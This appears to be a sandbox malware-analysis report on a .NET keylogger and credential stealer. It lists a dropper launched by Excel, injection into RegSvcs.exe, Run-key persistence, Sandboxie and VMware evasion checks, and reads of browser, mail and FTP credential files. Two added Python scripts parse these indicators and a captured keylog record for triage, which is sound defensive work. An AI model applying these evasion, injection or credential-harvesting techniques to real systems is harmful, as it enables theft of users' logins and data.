Source: Binary string: RegSvcs.pdb source: BINGO.exe, BINGO.exe, 00000006.00000000.959068378.0000000000E02000.00000020.00000001.01000000.00000008.sdmp, BINGO.exe, 00000006.00000002.961292531.0000000000E02000.00000020.00000001.01000000.00000008.sdmp, BINGO.exe.3.dr

Data Obfuscation

Source: dropped.exe.0.dr, Ug/Va.cs .Net Code: PQe contains xor as well as GetObject
Source: dropped.exe.0.dr, Ug/Va.cs .Net Code: tfA System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: C:\Users\user\AppData\Local\Temp\dropped.exe Code function: 2_2_007F50C7 pushfd ; ret 2_2_007F50C8
Source: C:\Users\user\AppData\Local\Temp\dropped.exe Code function: 2_2_007F72F0 push eax; retn 005Eh 2_2_007F72F1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_003E03B9 pushfd ; retf 001Ch 3_2_003E0421
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_003E03E2 pushfd ; retf 001Ch 3_2_003E0421
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_003E26D0 push 14003D37h; retf 3_2_003E26D5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00624D50 push eax; iretd 3_2_00624D91
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00624DA0 pushad ; iretd 3_2_00624DE1
Source: initial sample Static PE information: section name: .text entropy: 7.86212546256

Persistence and Installation Behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File created: C:\Users\user\AppData\Roaming\BINGO\BINGO.exe Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\dropped.exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run BINGO Jump to behavior

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Roaming\BINGO\BINGO.exe:Zone.Identifier read attributes | delete Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dropped.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\BINGO\BINGO.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion

Source: Yara match File source: 00000002.00000002.919772020.0000000002841000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.919684490.0000000002771000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: dropped.exe PID: 1980, type: MEMORYSTR
Source: dropped.exe, 00000002.00000002.919772020.0000000002841000.00000004.00000800.00020000.00000000.sdmp, dropped.exe, 00000002.00000002.919684490.0000000002771000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SBIEDLL.DLL
Source: dropped.exe, 00000002.00000002.919772020.0000000002841000.00000004.00000800.00020000.00000000.sdmp, dropped.exe, 00000002.00000002.919684490.0000000002771000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::CreateInstanceEnum - Win32_NetworkAdapterConfiguration
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::CreateInstanceEnum - Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\dropped.exe TID: 1200 Thread sleep time: -31989s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\dropped.exe TID: 1212 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\BINGO\BINGO.exe TID: 2944 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\BINGO\BINGO.exe TID: 940 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\dropped.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\BINGO\BINGO.exe Thread delayed: delay time: 922337203685477 (2 occurrences)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Window / User API: threadDelayed 8174
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Window / User API: threadDelayed 708
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor (23 occurrences)
Source: C:\Users\user\AppData\Local\Temp\dropped.exe Thread delayed: delay time: 31989
Source: C:\Users\user\AppData\Local\Temp\dropped.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 30000
Source: C:\Users\user\AppData\Roaming\BINGO\BINGO.exe Thread delayed: delay time: 922337203685477 (2 occurrences)
Source: dropped.exe, 00000002.00000002.919684490.0000000002771000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: dropped.exe, 00000002.00000002.919684490.0000000002771000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmware
Source: dropped.exe, 00000002.00000002.919684490.0000000002771000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMware SVGA II
Source: dropped.exe, 00000002.00000002.919684490.0000000002771000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
Source: C:\Users\user\AppData\Local\Temp\dropped.exe Process information queried: ProcessInformation
Source: C:\Users\user\AppData\Local\Temp\dropped.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\dropped.exe Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\AppData\Local\Temp\dropped.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\dropped.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\dropped.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000
Source: C:\Users\user\AppData\Local\Temp\dropped.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 402000
Source: C:\Users\user\AppData\Local\Temp\dropped.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 436000
Source: C:\Users\user\AppData\Local\Temp\dropped.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 438000
Source: C:\Users\user\AppData\Local\Temp\dropped.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 7EFDE008
Source: C:\Users\user\AppData\Local\Temp\dropped.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Source: RegSvcs.exe, 00000003.00000002.1171448504.0000000002537000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program Manager
Source: RegSvcs.exe, 00000003.00000002.1171503093.0000000002581000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: lu<font color="#00b1ba"><b>[ </b>Program Manager <b>]</b> <font color="#000000">(04/08/2022 12:52:29)</font></font><br>L)X
Source: RegSvcs.exe, 00000003.00000002.1171503093.0000000002581000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program Managerxe
Source: RegSvcs.exe, 00000003.00000002.1171503093.0000000002581000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Time: 04/08/2022 12:58:29<br>User Name: user<br>Computer Name: 082561<br>OSFullName: Microsoft Windows 7 Professional <br>CPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz<br>RAM: 8191.25 MB<br>IP Address: <br><hr><br><font color="#00b1ba"><b>[ </b>Program Manager <b>]</b> <font color="#000000">(04/08/2022 12:52:29)</font></font><br><font color="#00ba66">{Win}</font>r
Source: C:\Users\user\AppData\Local\Temp\dropped.exe Queries volume information: C:\Users\user\AppData\Local\Temp\dropped.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\BINGO\BINGO.exe Queries volume information: C:\Users\user\AppData\Roaming\BINGO\BINGO.exe VolumeInformation (2 occurrences)
Source: C:\Users\user\AppData\Roaming\BINGO\BINGO.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation (6 occurrences)
Source: C:\Users\user\AppData\Roaming\BINGO\BINGO.exe Queries volume information: C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Ente96d83b35#\692ae41749625908a626fd813aa21688\System.EnterpriseServices.Wrapper.dll VolumeInformation (2 occurrences)
Source: C:\Users\user\AppData\Local\Temp\dropped.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
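The evasion and injection sections above are flat event lists. The Python below is an added example written for this page (it is not part of the Joe Sandbox report and not code from the sample): it reads an inline excerpt of those lines and turns them into the two findings a triage analyst wants from them, the sandbox-evasion indicators (long or effectively infinite waits, Sandboxie/Wine/VMware strings, WMI hardware classes typically read to fingerprint a hypervisor) and the injection chain from dropped.exe into RegSvcs.exe (RWX allocation at 0x400000, a write beginning with the MZ bytes 4D5A, creation of the target process). The wait value 922337203685477 is .NET TimeSpan.MaxValue expressed in milliseconds, i.e. an effectively infinite wait that the sandbox fast-forwards; the 30000 cutoff is the report's own threshold and the sleep values are taken in whatever unit the report prints. The check that a write at 0x7EFDE008 is consistent with updating PEB.ImageBaseAddress (PEB + 8 for a 32-bit process, with the PEB at its usual Windows 7 address) is a heuristic and is labelled as such in the code; the event labels are assumed to be exactly as the report prints them.

```python
"""Triage of Joe Sandbox behaviour lines for sandbox evasion and PE injection.
Added example for this report, not code from the report or from the sample."""
import json
import re
from collections import defaultdict

# Excerpt of the behaviour lines listed in this report (link text removed),
# embedded so the example runs offline.
REPORT_LINES = r"""
Source: dropped.exe, 00000002.00000002.919772020.0000000002841000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SBIEDLL.DLL
Source: dropped.exe, 00000002.00000002.919684490.0000000002771000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::CreateInstanceEnum - Win32_BaseBoard
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\dropped.exe TID: 1200 Thread sleep time: -31989s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\dropped.exe TID: 1212 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\dropped.exe Thread delayed: delay time: 922337203685477
Source: dropped.exe, 00000002.00000002.919684490.0000000002771000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMware SVGA II
Source: C:\Users\user\AppData\Local\Temp\dropped.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\dropped.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\dropped.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 402000
Source: C:\Users\user\AppData\Local\Temp\dropped.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 7EFDE008
Source: C:\Users\user\AppData\Local\Temp\dropped.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
""".strip().splitlines()

TIMESPAN_MAX_MS = 922_337_203_685_477   # .NET TimeSpan.MaxValue in ms: an effectively infinite wait
SLEEP_THRESHOLD = 30_000                # the report's own ">= -30000s" cutoff, in the report's units

# Memory strings grouped by the analysis environment they fingerprint.
ARTEFACT_FAMILIES = {"Sandboxie": ("SBIEDLL",), "Wine": ("WINE_GET_UNIX_FILE_NAME",), "VMware": ("VMWARE",)}
# WMI classes commonly enumerated to read hypervisor-specific hardware names.
VM_FINGERPRINT_WMI = ("Win32_Processor", "Win32_BaseBoard", "Win32_NetworkAdapterConfiguration")
EVENTS = ("Binary or memory string", "WMI Queries", "Thread sleep time", "Thread delayed",
          "Memory allocated", "Memory written", "Process created")
MEM_RE = re.compile(r"(.+?) base: ([0-9A-Fa-f]+)(?: protect: (.+?))?(?: value starts with: ([0-9A-Fa-f]+))?$")


def parse_line(line):
    """Split 'Source: <source> <event>: <detail>' into (source, event, detail), or None."""
    if not line.startswith("Source: "):
        return None
    body = line[len("Source: "):]
    for event in EVENTS:
        idx = body.find(" " + event + ": ")
        if idx != -1:
            source = body[:idx].split(" TID: ")[0]       # sleep events carry 'TID: n' after the path
            return source, event, body[idx + len(event) + 3:]
    return None


def basename(path):
    return path.rsplit("\\", 1)[-1].split(",")[0]


def new_chain():
    return {"rwx_allocs": [], "writes": [], "pe_header_at": None,
            "peb_imagebase_hint": False, "target_created": False, "verdict": None}


def triage(lines):
    evasion = {"infinite_waits": 0, "long_sleeps": 0, "artefacts": defaultdict(list), "wmi_classes": set()}
    chains = {}
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        source, event, detail = parsed
        if event in ("Thread sleep time", "Thread delayed"):
            value = int(re.search(r"\d+", detail).group())
            if value >= TIMESPAN_MAX_MS:
                evasion["infinite_waits"] += 1
            elif value >= SLEEP_THRESHOLD:
                evasion["long_sleeps"] += 1
        elif event == "Binary or memory string":
            for family, needles in ARTEFACT_FAMILIES.items():
                if any(n in detail.upper() for n in needles):
                    evasion["artefacts"][family].append(detail)
        elif event == "WMI Queries":
            evasion["wmi_classes"].update(c for c in VM_FINGERPRINT_WMI if c in detail)
        elif event == "Process created":
            target = detail.split(" ")[0]               # image path; quoted paths with spaces would need a real splitter
            chains.setdefault((basename(source), basename(target)), new_chain())["target_created"] = True
        else:                                            # Memory allocated / Memory written in a foreign process
            m = MEM_RE.match(detail)
            if m is None:                                # allocation in the process's own address space
                continue
            target, base, protect, first_bytes = m.groups()
            base = int(base, 16)
            chain = chains.setdefault((basename(source), basename(target)), new_chain())
            if event == "Memory allocated":
                if protect and "execute" in protect and "write" in protect:
                    chain["rwx_allocs"].append(base)
            else:
                chain["writes"].append(base)
                if first_bytes and first_bytes.upper().startswith("4D5A"):   # 'MZ': a PE image
                    chain["pe_header_at"] = base
                # Heuristic: 0x7EFDE000 is the usual 32-bit PEB on this Windows 7 host and
                # PEB+8 is ImageBaseAddress, which hollowing updates after writing the new image.
                if 0x7EF00000 <= base < 0x7F000000 and base & 0xFFF == 0x008:
                    chain["peb_imagebase_hint"] = True
    for chain in chains.values():
        if chain["target_created"] and chain["pe_header_at"] in chain["rwx_allocs"]:
            chain["verdict"] = "PE image written into an RWX region of a child it created (process hollowing pattern)"
        elif chain["writes"]:
            chain["verdict"] = "foreign-process memory write"
        else:
            chain["verdict"] = "no injection evidence"
    evasion["artefacts"] = dict(evasion["artefacts"])
    evasion["wmi_classes"] = sorted(evasion["wmi_classes"])
    return {"evasion": evasion, "injection": {f"{s} -> {t}": c for (s, t), c in chains.items()}}


if __name__ == "__main__":
    print(json.dumps(triage(REPORT_LINES), indent=2))
```

Run stand-alone it prints one JSON document with both findings; the same `triage()` works on the full behaviour list of any report in this format, since lines whose event label is not in `EVENTS` are simply skipped.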

Stealing of Sensitive Information

Source: Yara match File source: 3.0.RegSvcs.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.0.RegSvcs.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.0.RegSvcs.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.0.RegSvcs.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.dropped.exe.38fb8f8.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.dropped.exe.38c70d8.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.dropped.exe.38c70d8.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.dropped.exe.3890ab8.9.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.dropped.exe.38fb8f8.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000003.00000000.918109531.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000000.918357600.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000000.917564622.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000000.917821418.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.1170971637.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.920171454.0000000003890000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.1171392057.00000000024D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: dropped.exe PID: 1980, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RegSvcs.exe PID: 2260, type: MEMORYSTR
Source: Yara match File source: 00000003.00000002.1171392057.00000000024D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: dropped.exe PID: 1980, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RegSvcs.exe PID: 2260, type: MEMORYSTR
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini (2 occurrences)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cookies.sqlite
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
Source: Yara match File source: 00000003.00000002.1171392057.00000000024D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: RegSvcs.exe PID: 2260, type: MEMORYSTR
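The RegSvcs.exe memory strings in the previous section hold the keylog buffer this stealer builds alongside the credential-store reads listed here: a host header (Time, User Name, Computer Name, OSFullName, CPU, RAM, IP Address) separated by `<br>`, then `<hr>`, then one entry per focused window (`[ Program Manager ]` with the focus timestamp) followed by the keystrokes, where special keys such as `{Win}` are wrapped in a coloured font and plain characters follow literally. The Python below is an added example written for this page (not the report's or the sample's code) that parses that record as it appears on this page and the truncated second copy of it; the colour codes and field names are taken from those strings, and the parser assumes no markup other than what they show.

```python
"""Parser for the keylog record recovered from RegSvcs.exe memory in this report.
Added example for this report, not code from the report or from the sample."""
import re

# The record as it appears in the RegSvcs.exe memory strings, and a fragment of a
# second copy; both are embedded so the example runs offline.
RECORD = ('Time: 04/08/2022 12:58:29<br>User Name: user<br>Computer Name: 082561<br>'
          'OSFullName: Microsoft Windows 7 Professional <br>CPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz<br>'
          'RAM: 8191.25 MB<br>IP Address: <br><hr><br>'
          '<font color="#00b1ba"><b>[ </b>Program Manager <b>]</b> '
          '<font color="#000000">(04/08/2022 12:52:29)</font></font><br>'
          '<font color="#00ba66">{Win}</font>r')
FRAGMENT = ('lu<font color="#00b1ba"><b>[ </b>Program Manager <b>]</b> '
            '<font color="#000000">(04/08/2022 12:52:29)</font></font><br>L)X')

HEADER_FIELDS = ("Time", "User Name", "Computer Name", "OSFullName", "CPU", "RAM", "IP Address")
# Window header: "[ title ]" in the cyan font, then the timestamp at which that window took focus.
WINDOW_RE = re.compile(r'<font color="#00b1ba"><b>\[ </b>(?P<title>.*?) <b>\]</b> '
                       r'<font color="#000000">\((?P<ts>[^)]*)\)</font></font>')
# Keystrokes: special keys in braces inside the green font, <br> for a line break, other text typed literally.
KEY_RE = re.compile(r'<font color="#00ba66">(?P<special>\{[^}]*\})</font>|(?P<br><br>)|(?P<text>[^<]+)')


def parse_keys(segment):
    """Turn the markup between two window headers into a list of key chunks."""
    keys = []
    for m in KEY_RE.finditer(segment):
        if m.group("special"):
            keys.append(m.group("special"))
        elif m.group("br"):
            keys.append("\n")
        else:
            keys.append(m.group("text"))
    return keys


def parse_keylog_record(record):
    """Return {'host': {...}, 'windows': [{'title', 'timestamp', 'keys', 'typed'}, ...]}."""
    head, sep, body = record.partition("<hr>")
    if not sep:                       # fragment without the host header
        head, body = "", record
    host = {}
    for part in head.split("<br>"):
        key, _, value = part.partition(": ")
        if key in HEADER_FIELDS:
            host[key] = value.strip()
    windows = []
    headers = list(WINDOW_RE.finditer(body))
    for i, m in enumerate(headers):
        end = headers[i + 1].start() if i + 1 < len(headers) else len(body)
        segment = body[m.end():end]
        if segment.startswith("<br>"):   # separator between the header and the first key
            segment = segment[4:]
        keys = parse_keys(segment)
        windows.append({"title": m.group("title"), "timestamp": m.group("ts"),
                        "keys": keys, "typed": "".join(keys)})
    return {"host": host, "windows": windows}


if __name__ == "__main__":
    for rec in (RECORD, FRAGMENT):
        parsed = parse_keylog_record(rec)
        print(parsed["host"])
        for w in parsed["windows"]:
            print(f"[{w['title']}] ({w['timestamp']}): {w['typed']!r}")
```

For the full record the only keystrokes captured are `{Win}` followed by `r`, i.e. the Win+R run dialog being opened on the desktop (window title "Program Manager") during the analysis; the fragment yields the same window header with junk bytes around it, which is what carving such records out of a memory dump typically looks like.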

Remote Access Functionality

Source: Yara match File source: 3.0.RegSvcs.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.0.RegSvcs.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.0.RegSvcs.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.0.RegSvcs.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.dropped.exe.38fb8f8.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.dropped.exe.38c70d8.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.dropped.exe.38c70d8.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.dropped.exe.3890ab8.9.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.dropped.exe.38fb8f8.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000003.00000000.918109531.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000000.918357600.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000000.917564622.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000000.917821418.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.1170971637.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.920171454.0000000003890000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.1171392057.00000000024D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: dropped.exe PID: 1980, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RegSvcs.exe PID: 2260, type: MEMORYSTR
Source: Yara match File source: 00000003.00000002.1171392057.00000000024D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: dropped.exe PID: 1980, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RegSvcs.exe PID: 2260, type: MEMORYSTR